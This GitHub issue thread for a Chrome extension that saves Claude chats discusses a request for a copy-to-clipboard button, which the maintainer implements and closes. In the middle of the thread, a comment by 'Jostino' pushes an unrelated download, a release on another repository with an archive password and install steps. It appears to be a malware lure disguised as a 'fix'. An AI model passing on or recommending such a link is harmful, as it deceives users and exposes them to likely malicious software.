### ISSUE TITLE
Suggestion: copy button, for copying out Markdown without doing the Gist thing

### ISSUE THREAD

**Issue by simonw** [hamelsmu/claudesave#5]
I'd like to be able to use this extension without the hassle of setting up a PAT, so having a "copy" option which copies the Markdown to my clipboard would be really handy.

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hamelsmu** [comment]
closed by #6

**Comment by hamelsmu** [comment]
BTW updates to the chrome store involve a human review, so it takes 24+ hours.  In the meantime, you can install the extension from this GitHub repo (instructions in the README).  

I'll tweet about it when its updated in the Chrome Webstore
